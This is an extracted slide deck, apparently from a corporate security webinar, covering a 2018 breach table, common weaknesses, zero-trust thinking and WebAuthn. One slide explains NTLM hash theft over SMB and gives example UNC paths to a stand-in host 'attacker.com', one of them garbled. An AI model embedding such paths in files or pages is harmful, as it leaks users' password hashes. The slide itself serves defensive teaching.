This webinar describes and analyses data we collected from millions of cracked passwords obtained during attack and penetration tests performed against dozens of corporate customers worldwide... and what that could mean for your organisation!
4. 1/30/2020 4
Date Victim Categories MTD State PWD Accident PPI
Feb-18 FedEx 5 Possibly No No Yes Yes
Feb-18 Swisscom 2 ? ? No Yes Yes
Feb-18 Tesla 3 Probably No No No No
Feb-18 City of Houston 4 No ? No No Yes
Mar-18 US universities, companies & government agencies 4 Yes Yes Yes No Yes
Mar-18 Under Armour - MyFitnessPal 2 Possibly ? Yes No Yes
Mar-18 RMH Franchise Holdings (Applebees Restaurants) 5 Yes ? No No Yes
Mar-18 California State University, Fresno 4 No ? Yes Yes Yes
Mar-18 City of Atlanta 5 Yes Yes Probably No Yes
Apr-18 MyEtherWallet.com 3 Possibly ? Yes No Probably
Apr-18 Saks Fifth Avenue and Lord & Taylor 3 Yes No Probably No Yes
Apr-18 Panerabread.com 6 Probably No No No Yes
Jun-18 MyHeritage 3 No ? Yes Yes Yes
Jun-18 Exactis 3 Possibly No No Yes Yes
Jun-18 Ticketmaster 4 No No No No Yes
Jun-18 Adidas 1 Possibly ? Yes No Yes
Jul-18 PIR Bank (Russia) 4 Yes No Unlikely No Yes
Jul-18 mSpy 3 No No Yes Yes Yes
Aug-18 Cosmos Bank 4 Possibly ? No No Yes
Sep-18 British Airways 4 No No No No Yes
Sep-18 Facebook 1 No ? No No Yes
Sep-18 Newegg 4 No No No No Yes
Oct-18 Cathay Pacific 2 Yes ? No No Yes
Nov-18 Marriott 4 Yes Possibly No No Yes
5. 1/30/2020 5
The real issues
Enabling business transformation
Stopping known exploits
Securing in-house & cloud applications
Changing user behaviour
Insecure endpoints
Know your enemy, Know thyself
Weak authentication
No barriers inside networks
6. 1/30/2020 6
The real issues
Enabling business transformation
Stopping known exploits
Securing in-house & cloud applications
Changing user behaviour
Insecure endpoints
Know your enemy, Know thyself
Weak authentication
No barriers inside networks
42%
15. 1/30/2020 15
WE THINK IN LISTS. ATTACKERS THINK IN GRAPHS.
https://blogs.technet.microsoft.com/johnla/2015/04/26/defenders-think-in-lists-attackers-
think-in-graphs-as-long-as-this-is-true-attackers-win/
16. 1/30/2020 16
WE THINK IN LISTS. ATTACKERS THINK IN GRAPHS
https://blogs.technet.microsoft.com/johnla/2015/04/26/defenders-think-in-lists-attackers-
think-in-graphs-as-long-as-this-is-true-attackers-win/
22. 1/30/2020 22
SMB Port 445
• Server Message Block (SMB) protocol
• Windows uses it to share files, printers and serial ports
• NTLM authentication is used
• Windows wants to make your life easy
• This can be used to steal NTLM challenge-response
password hashes from SMB clients
• Attackers can trick a target into connecting to their SMB
server
• UNC paths in websites, documents, phishing emails etc
• For example:
• attacker.comshare-namefile.txt
• file://///attacker.com/share/folder/file.txt
39. 1/30/2020 40
• The desktop is the target
• Direct access to user data
• The desktop is the user
• Inherited privileges on other systems
• Easy access to domain credentials
• Direct access to user location, video and audio
• The desktop is a foothold
• Ideal location for lateral movement and pivoting
• Numerous channels for exfiltration
• Excessive event data makes monitoring hard
• The desktop is a soft target
• The desktop is a big target
• User behaviour creates complex human-
machine system
• Directly accessible from the Internet!
41. 1/30/2020 42
While most enterprises assume that the internal network is a safe environment in
which to expose corporate applications, Google’s experience has proven that this
faith is misplaced. Rather, one should assume that an internal network is as
fraught with danger as the public Internet and build enterprise applications based
upon this assumption.
43. 1/30/2020 44
KNOW who You Are
KNOW your Footprint
KNOW your Threat Model
KNOW your Vulnerabilities
KNOW how you react under assault
KNOW that something happened
KNOW what happened
KNOW what you’re going to do next
44. 1/30/2020 45
Think Authentication
The Web Authentication API (also known as
WebAuthn) is a specification written by
the W3C and FIDO, with the participation of
Google, Mozilla, Microsoft, Yubico, and others.
The API allows servers to register and
authenticate users using public key
cryptography instead of a password.
It allows servers to integrate with the strong
authenticators now built into devices, like
Windows Hello or Apple’s Touch ID. Instead of a
password, a private-public keypair (known as
a credential) is created for a website.
The private key is stored securely on the user’s
device; a public key and randomly generated
credential ID is sent to the server for storage.
The server can then use that public key to
prove the user’s identity.